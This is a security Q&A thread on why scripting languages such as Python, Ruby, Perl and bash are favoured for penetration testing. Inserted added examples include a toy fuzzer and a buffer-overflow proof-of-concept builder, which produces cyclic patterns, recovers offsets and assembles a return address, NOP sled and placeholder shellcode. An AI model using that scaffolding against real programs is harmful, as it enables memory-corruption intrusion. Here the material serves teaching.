32

I know that scripting languages (Perl, Ruby, Python, JavaScript, and even Lua!!!) are most suitable for hacking and penetration testing.

My question is: What is it that makes those languages suitable? From what I know, they are slower than other languages, and operate at a higher abstraction level, which means they are too far from the hardware. The only reason I can think of is their advanced string manipulation capabilities, but I believe that other languages have such capabilities.

AviD
NlightNFotis

8 Answers

30

Languages are useful for doing things. What type of things it's suitable for completely depends on the type of language, the frameworks available for it, what OSes have interpreters / compilers for it, etc.

Let's look at the ones you've mentioned:

  • Perl
    • Scripting language
    • General purpose
    • Available on most *nix OSes since the '90s.
    • Great for quick hacks and short scripts.
  • Ruby
    • Scripting language
    • General purpose
    • Cross-platform
    • Object-oriented
    • Reflective (can see its own structure and code)
    • Good for dynamic frameworks
  • Python
    • Scripting language
    • General purpose
    • Cross-platform
    • Designed for clear and readable source code
    • Huge framework of libraries
  • JavaScript
    • Scripting language
    • Web-based
    • Cross-platform (available on every major browser)

So what makes these particularly good for pentesting? Well, most pentesting involves writing up quick throw-away tools to do a specific job for a specific test. Writing such a tool in C or C++ every time you want to do a quick job is cumbersome and time-consuming. Furthermore, they tend to produce platform-specific binaries or source that requires platform-specific compilation, rather than cross-platform scripts that just run. Scripting languages give you the flexibility to produce such tools quickly and easily.

For example, Ruby and Python are popular for more complex tasks because they have comprehensive libraries, whereas Perl is popular for quick data processing hacks. JavaScript is commonly utilised as a simple browser-based language that everyone has access to. Other languages such as C tend to be used for more low-level tasks that interface with the OS.

Now, the other side of the coin is languages used as payloads. This is where the line gets blurred, because requirements are so varied. For attacking Windows boxes, any payload that has no dependencies outside of what the OS provides is useful. This might be C, C++, VBScript, x86 asm, C# / VB.NET (.NET 2.0 is on most machines these days), etc. For attacking Linux boxes you might use C, C++, bash scripts or Perl. Java is also common for cross-platform attacks.

At the end of the day, pick the language that you find best for the job!

Polynomial
  • All of the examples are OO languages, however, Perl is more bolted on than integrated IMHO. If you are going to include JS in the list I think a more fitting option would have been PHP as well. Lastly, as much as I hate to say it, Perl still has the largest amount of libraries out there. This will change, but CPAN has been around a long time so it's the nature of the beast. – dc5553 May 12 '13 at 08:54
  • You might also want to mention Perl's huge framework of libraries (cpan.org), and that it's just as available cross platform (cygwin and activeperl). – atk Nov 03 '13 at 12:27
  • Main problem I find with Perl libraries is that they're rarely "modern". You can easily find Python stuff for parsing pcap-ng formats, integrating with VLC, manipulating SVGs, etc., but it's usually harder to find well-documented, cleanly designed, and full-featured libraries for Perl that do that kind of thing. Perl is *awesome* at doing gritty manipulation of primitives, and integrating with nix / bash, but it falls a bit flat when doing more complex work. – Polynomial Nov 04 '13 at 21:21
16

Here is a great answer I found on a Stack Overflow question of similar context by @tqbf: (I copied this answer here, because I believe it gives valid reasons for which they may be preferred, so it might be useful to future readers)

You probably want Ruby, because it's the native language for Metasploit, which is the de facto standard open source penetration testing framework. Ruby's going to give you:

  • Metasploit's framework, opcode and shellcode databases

  • Metasploit's Ruby lorcon bindings for raw 802.11 work

  • Metasploit's KARMA bindings for 802.11 clientside redirection

  • Libcurl and net/http for web tool writing

  • EventMachine for web proxy and fuzzing work (or RFuzz, which extends the well-known Mongrel webserver)

  • Metasm for shellcode generation

  • Distorm for x86 disassembly

  • BinData for binary file format fuzzing.

Second place here goes to Python. There are more pentesting libraries available in Python than in Ruby (but not enough to offset Metasploit). Commercial tools tend to support Python as well --- if you're an Immunity CANVAS or CORE Impact customer, you want Python. Python gives you:

  • Twisted for network access

  • PaiMei for program tracing and programmable debugging

  • CANVAS and Impact support

  • Dornseif's firewire libraries for remote debugging

  • Ready integration with WinDbg for remote Windows kernel debugging (there's still no good answer in Ruby for kernel debugging, which is why I still occasionally use Python).

  • Peach Fuzzer and Sulley for fuzzing

  • SpikeProxy for web penetration testing (also, OWASP Pantera).

Unsurprisingly, a lot of web work uses Java tools. The de facto standard web pentest tool is Burp Suite, which is a Java Swing app. Both Ruby and Python have Java variants you can use to get access to tools like that. Also, both Ruby and Python offer:

  • Direct integration with libpcap for raw packet work

  • OpenSSL bindings for crypto

  • IDA Pro extensions

  • Mature (or at least reasonable) C foreign function interfaces for API access

  • WxWindows for UI work, and decent web stacks for web UIs

You're not going to go wrong with either language, though for mainstream pentest work, Metasploit probably edges out all the Python benefits, and at present, for x86 reversing work, Python's superior debugging interfaces edge out all the Ruby benefits.

Also: it's 2008. They're not "scripting languages". They're programming languages. ;)

NlightNFotis
  • +1 since largely the capability for re-use of existing frameworks is the single largest benefit. I can certainly write apps to pen-test in any language, but not-having to reinvent the wheel (and not having to compile) gives directly executed languages a bit of a benefit – iivel Sep 21 '12 at 16:12
  • @iivel ^^this and compiling is one thing. Debugging is another =) – NlightNFotis Sep 21 '12 at 16:13
  • I can't tell you how much I hate debugging PERL though ... at least the Eclipse PERL debugger is pretty good :) It is good for knocking something out quick - but like LISP; it just hurts my brain. – iivel Sep 21 '12 at 16:17
  • One huge reason I would choose Python is Scapy. Sure Metasploit runs on Ruby but that's no reason to make it the "hackers" scripting language of choice. – dc5553 May 12 '13 at 08:56
  • @dc5553 There are a number of frameworks in Python that are useful for hacking. [Hachoir](https://bitbucket.org/haypo/hachoir) is another very useful framework used to analyse file types. – NlightNFotis May 12 '13 at 13:11
  • Canvas is also written in Python :) – dc5553 May 12 '13 at 13:20
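The quoted answer lists fuzzing libraries (Peach, Sulley, BinData, RFuzz) without showing what such a tool actually does. As an added example, not code from the answer or from any of those projects, here is the skeleton of a mutation fuzzer in plain Python against a toy length-prefixed record format: the format, the parser and its two planted bugs (trusting the length field, decoding untrusted bytes as UTF-8) are all constructed for the illustration, and the seed input is made up.

```python
"""Toy binary-format fuzzer: mutate a seed input, feed each mutant to a
parser, and record the first input that makes the parser die with an
exception it did not intend to raise. Added example; the format is invented."""
import random
import struct

MAGIC = b"TL"  # assumed 2-byte magic for the toy format


class ParseError(Exception):
    """Errors the parser is *supposed* to raise on malformed input."""


def parse(buf):
    """Parse MAGIC followed by records of (type: 1 byte, length: 2 bytes BE,
    payload). Type 1 carries a big-endian uint32, type 2 a UTF-8 string.
    Deliberately fragile: it trusts the length field when interpreting the
    payload, which is the kind of bug a fuzzer is meant to surface."""
    if buf[:2] != MAGIC:
        raise ParseError("bad magic")
    off, records = 2, []
    while off < len(buf):
        if off + 3 > len(buf):
            raise ParseError("truncated header")
        rtype = buf[off]
        length = struct.unpack(">H", buf[off + 1:off + 3])[0]
        off += 3
        if off + length > len(buf):
            raise ParseError("truncated payload")
        payload = buf[off:off + length]
        off += length
        if rtype == 1:
            records.append((1, struct.unpack(">I", payload)[0]))  # dies if length != 4
        elif rtype == 2:
            records.append((2, payload.decode("utf-8")))          # dies on non-UTF-8 bytes
        else:
            raise ParseError("unknown record type %d" % rtype)
    return records


def record(rtype, payload):
    """Encode one record in the toy format."""
    return bytes([rtype]) + struct.pack(">H", len(payload)) + payload


# Constructed valid seed: one uint32 record and one string record.
SEED = MAGIC + record(1, struct.pack(">I", 42)) + record(2, b"hello")


def mutate(data, rng):
    """Apply one random mutation: flip a bit, overwrite a byte, or drop a byte."""
    data = bytearray(data)
    choice = rng.randrange(3)
    pos = rng.randrange(len(data))
    if choice == 0:
        data[pos] ^= 1 << rng.randrange(8)
    elif choice == 1:
        data[pos] = rng.randrange(256)
    else:
        del data[pos]
    return bytes(data)


def fuzz(seed, iterations=2000, rng_seed=1):
    """Return (exception class name, crashing input) for the first unexpected
    exception, or None if the parser rejected or accepted every mutant cleanly."""
    rng = random.Random(rng_seed)
    for _ in range(iterations):
        sample = mutate(seed, rng)
        try:
            parse(sample)
        except ParseError:
            continue              # rejected cleanly: the parser doing its job
        except Exception as exc:  # anything else is a bug in the parser
            return type(exc).__name__, sample
    return None


if __name__ == "__main__":
    print(parse(SEED))
    print(fuzz(SEED))
```

The same loop is what the listed frameworks wrap in far more machinery (grammar-aware generation, instrumentation, crash triage); swapping `parse` for a call into a real target and `mutate` for a smarter generator is the whole difference.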
7

Libraries, time to write code, and cross-platform compatibility are key here. I found that using Python I was able to come up with proof-of-concept exploits in a very short amount of time with a minimum number of lines of code. This is possible because of the extensive standard library and the additional libraries that you can download as well. I believe that is Python's greatest strength for pentesting and hacking.

E.g. you need a string 1000 characters / 1000 bytes long.

In python:

print("A" * 1000)

In C :

for (i = 0; i < 1000; i++) printf("A");

(Apart from all the includes mumbo jumbo and compiling it)

That is just a simple example. But as you can see, such a trivial task is far simpler (and quicker) in Python.

The difference is even greater when you want to send HTTP requests etc. from your code. With urllib, httplib, etc. for Python, you can do it in a matter of 2 lines of code.

Lie Ryan
sudhacker
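The answer above stops at producing the 1000-byte string. As an added example (not the poster's code), here is what the next few steps of such a Python proof-of-concept usually look like: a Metasploit-style cyclic pattern to find where the crash lands, and a builder that places a return address and a stub in the oversized buffer. The register value, the return address and the int3 stub standing in for shellcode are made-up placeholders, and the offset recovery assumes a 32-bit little-endian target.

```python
"""Buffer-overflow PoC helpers: cyclic pattern generation, offset recovery
from a crashed register, and payload assembly. Added example, not from the
original answer; all addresses and the shellcode stub are placeholders."""
import string
import struct


def pattern_create(length):
    """Return `length` bytes of the Upper/lower/digit triplet sequence
    (Aa0Aa1Aa2...). Every 4-byte window is unique within the first 20280 bytes,
    which is what makes the offset lookup below unambiguous."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode("ascii")
    raise ValueError("a pattern longer than 20280 bytes is no longer unique")


def pattern_offset(pattern, needle):
    """Offset of `needle` (bytes) inside `pattern`, or -1 if it is not there."""
    return pattern.find(needle)


def offset_from_register(pattern, value, width=4):
    """Translate a crashed register value (e.g. EIP = 0x41336141) back to the
    offset in the pattern. The register holds the overwritten bytes in
    little-endian order, so pack the value that way before searching."""
    fmt = "<I" if width == 4 else "<Q"
    return pattern_offset(pattern, struct.pack(fmt, value))


def build_payload(offset, return_address, shellcode, total_length, nop=b"\x90"):
    """Assemble: padding | return address (LE) | 16-byte NOP sled | shellcode | filler.
    `total_length` keeps the PoC a fixed size, like print("A" * 1000) does."""
    head = b"A" * offset + struct.pack("<I", return_address)
    body = head + nop * 16 + shellcode
    if len(body) > total_length:
        raise ValueError("payload does not fit in %d bytes" % total_length)
    return body + b"C" * (total_length - len(body))


if __name__ == "__main__":
    pat = pattern_create(1000)
    # Pretend the debugger showed EIP = 0x41336141 after feeding `pat` to the target.
    off = offset_from_register(pat, 0x41336141)
    print("offset to saved return address:", off)
    # 0xDEADBEEF and the int3 (0xCC) stub are placeholders for a real gadget and shellcode.
    payload = build_payload(off, 0xDEADBEEF, b"\xcc" * 8, 1000)
    print(len(payload), payload[off:off + 4].hex())
```

In practice the pattern goes out over the socket or HTTP request in place of the `"A" * 1000`, the crash is read off in the debugger, and `build_payload` replaces the pattern on the next run; that loop is the "few lines, short time" the answer is describing.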
6

I think what defines a language suited for hacking, is:

  1. Usage of the language.
  2. Cross platform support.

Take Java as an example. It runs on all platforms, and is installed on a lot of systems. This ensures a fairly high probability that the hacker's code can run, and that the language is installed on the system he targets.

The community of a given highly used programming language also occasionally finds vulnerabilities in the language, which allows hackers to target that vulnerability and have a very high chance of hitting it, due to the high distribution of the language.

Kao
6

I have zero knowledge in these fields, but the mentioned programming languages all enable rapid programming, i.e. one could try out a much larger number of different ideas in a given time frame than with the more runtime-efficient but inefficient for programming (and debugging) programming languages like C etc. That might be a point.

Mok-Kong Shen
6

Some good answers already to this one but I'll provide another perspective. One reason that scripting languages tend to be used for hacking is that they optimize for speed (and ease) of development which is likely to be a key factor.

As an example, for penetration testing scripting I use ruby. It has a number of good libraries for things like HTTP which mean I don't have to worry about low level details and writing a quick script is very fast as there's little "formality" required in a ruby script (e.g. method/variable declarations) when compared with languages like Java.

One of the downsides of these languages can be that they are slower at run-time, but for a lot of hacking work that's not an issue, speed of development is more important.

Rory McCune
3

My two cents:

Run bash (or another shell) first!!

The quickness of the language doesn't matter when you are in full brainstorm!

One of the most useful and powerful languages for this kind of operation seems to be forgotten in your question.

I would like to talk about bash as a hacking environment. Yes, it takes its name from the shell, which may hold a lot of other things.

Under Un*x, you're primarily logged in to a console, to be able to run other tools.

Even if it is one of the slower languages:

$ time for ((i=1000000;i--;));do :;done
real    0m4.755s
user    0m4.628s
sys     0m0.124s

$ time perl -e 'map{1}(0..1000000)'
real    0m0.199s
user    0m0.112s
sys     0m0.060s

$ time python -c 'for a in range(1000000): 1==1'
real    0m0.119s
user    0m0.096s
sys     0m0.020s

Yes! More than 4 seconds for a 1 million step loop is very slow, but once you're logged in to a command line console...

Main advantages to be considered:

  • history: you could save/copy your history in order to consult it later or to build a script
  • log: by using tools like script and scriptreplay you could keep a very precise trace of all your work
  • cut'n'paste: by using an X terminal or tools like screen, you could run parallel tasks on separate consoles and share inputs/outputs between all of them
  • fifo: by merging simple but powerful tools like nc | sed | ssh | python ...

Practical sample

You could start from:

$ mkdir /tmp/hackingGoogle
$ cd $_

then

$ nc google.com 80 <<<$'HEAD /fonts/ HTTP/1.0\r\n\r'
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
...

From there, you may use any tool you want, like ping, traceroute, openssl, nmap, etc...

$ openssl s_client -connect google.com:443 -ign_eof \
      <<< $'HEAD / HTTP/1.0\r\n\r' 2>&1 | \
    openssl x509 -in /dev/stdin -out certfile
$ openssl x509 -in certfile -noout -fingerprint
SHA1 Fingerprint=67:1B:98:92:48:86:FF:E1:C5:02:44:C5:9F:F3:96:78:08:F5:0A:45
$ openssl x509 -in certfile -noout -subject
subject= /C=US/ST=California/L=Mountain View/O=Google Inc/CN=*.google.com

If you're interested in SSL, there are some more sample scripts

or...

$ wget https://www.google.com/fonts/
$ vi index.html
$ wget https://www.google.com/fonts/webfonts.nocache.js
$ smjs < <(sed < webfonts.nocache.js 's/Window....')
...

for playing with JavaScript...

Useful environment for storing variables:

$ ip=();ANS=false;while read -a line;do if [[ "$line" = ";;" ]];then [[ \
    "${line[1]}" = "ANSWER" ]] && ANS=true || ANS=false; fi ; $ANS && [[ \
    "${line[2]}" == "IN" ]] && ip+=(${line[4]});done < <(dig www.google.com)
$ printf "%s\n" ${ip[@]}
173.194.116.51
173.194.116.52
173.194.116.48
173.194.116.49
173.194.116.50

Depending on what you're searching for, you could freely use all your tools in any combination.

$ grep ^64 < <(for host in ${ip[@]};do ping -c2 $host&done;wait)|sort -t. -nk4
64 bytes from 173.194.113.112: icmp_req=1 ttl=54 time=45.4 ms
64 bytes from 173.194.113.112: icmp_req=2 ttl=54 time=47.8 ms
64 bytes from 173.194.113.113: icmp_req=1 ttl=54 time=41.4 ms
64 bytes from 173.194.113.113: icmp_req=2 ttl=54 time=40.2 ms
64 bytes from 173.194.113.114: icmp_req=1 ttl=54 time=43.1 ms
64 bytes from 173.194.113.114: icmp_req=2 ttl=54 time=39.0 ms
64 bytes from 173.194.113.115: icmp_req=1 ttl=54 time=47.0 ms
64 bytes from 173.194.113.115: icmp_req=2 ttl=54 time=42.1 ms
64 bytes from 173.194.113.116: icmp_req=1 ttl=54 time=43.9 ms
64 bytes from 173.194.113.116: icmp_req=2 ttl=54 time=39.0 ms

This could be rewritten as a mini script from there.

With this, you will make two pings, parallelized (this will normally take only about 1 second), on ~5 hosts:

#!/bin/bash
# Collect the A records from dig's ANSWER section into the ip array
ip=()
ANS=false
while read -a line; do
    if [[ "$line" = ";;" ]]; then
        [[ "${line[1]}" = "ANSWER" ]] && ANS=true || ANS=false
    fi
    $ANS && [[ "${line[2]}" == "IN" ]] && ip+=("${line[4]}")
done < <(dig www.google.com)

# Ping every address in parallel, keep only the reply lines, sort by last octet
grep ^64 < <(
    for host in "${ip[@]}"; do
        ping -c2 "$host" &
    done
    wait
) | sort -t. -nk4

Other (more efficient) languages

Once the goal is fixed, after a lot of brainf@#@ing, the common hacker will run his preferred editor and store his exploit as a script to automate the next run.

The choice of the language used will depend mainly on the hacker's preferences. (If not required by his boss.)

And before reinventing the wheel...

There are already a lot of tools dedicated to pentesting, scanning, research and analysis. If you use Debian, you could have a look at the Debian Forensics Environment...

Anyway, the best environment for testing and logging each step of this kind of job is a shell (like bash ;-)

  • Bash is a scripting language, but what you are describing here is more stringing tools together than actual scripting. – Luc Jul 19 '14 at 20:06
  • @Luc: [tag:bash] is a *scripting language* but it's also a powerful *user environment*. You could make a lot of successive tries against your goal, then finally dump the history to your [preferred editor](http://www.gnu.org/software/emacs/) ...to begin your work/script. You could even quickly edit temporary scripts, use *myFunc() { ...; }* on the command line, create immediate loops, and so on... – F. Hauri - Give Up GitHub Jul 19 '14 at 22:14
  • Sorry for my english... Edit welcome! – F. Hauri - Give Up GitHub Jul 07 '18 at 07:29
  • Bash is an OS shell with support for scripting, but not really a full-featured scripting language. Note also that, while bash itself is really, really slow, dash and zsh are a good bit faster (but still not as fast as something like Python that uses JIT). – forest Jul 08 '18 at 02:53
  • @forest Yes, but hacking is a kind of brainstorming... Quickness of the interpreter doesn't matter while you are thinking... – F. Hauri - Give Up GitHub Jul 08 '18 at 06:02
  • @F.Hauri That entirely depends on what you are doing in the shell. Plenty of times, you'll need to do something that can be very slow. I've had times where I've waited for a bash command to complete because it was inefficient. – forest Jul 08 '18 at 11:48
-6
#include <stdio.h>

int main()
{
    int i, list[1000];

    /* fill a 1000-element buffer with 'A' */
    for (i = 0; i < 1000; i++) {
        list[i] = 'A';
    }
    return 0;
}

I don't see any mumbo jumbo here. In fact this is not that much longer than a full Python program to do the same. Some loops are shorter in C than they could ever be with Python, especially when in C you can use pointers, which give considerably more power and shorten the code to between 10 and 70 percent of the Python equivalent. Of course normally C code is longer because that's just the nature of more powerful languages.

Anyway hacking is done in C the best. forget anything else just go C.

Adi
  • -1 The whole point under discussion here is the capability of a language to produce code quickly and easily for performing one particular task; the script should be platform independent and it should have access to a large set of libraries useful for hacking. When was the last time you wrote a network protocol fuzzer in C? Compare that to a 5 line Python program calling Scapy. – void_in Nov 03 '13 at 09:26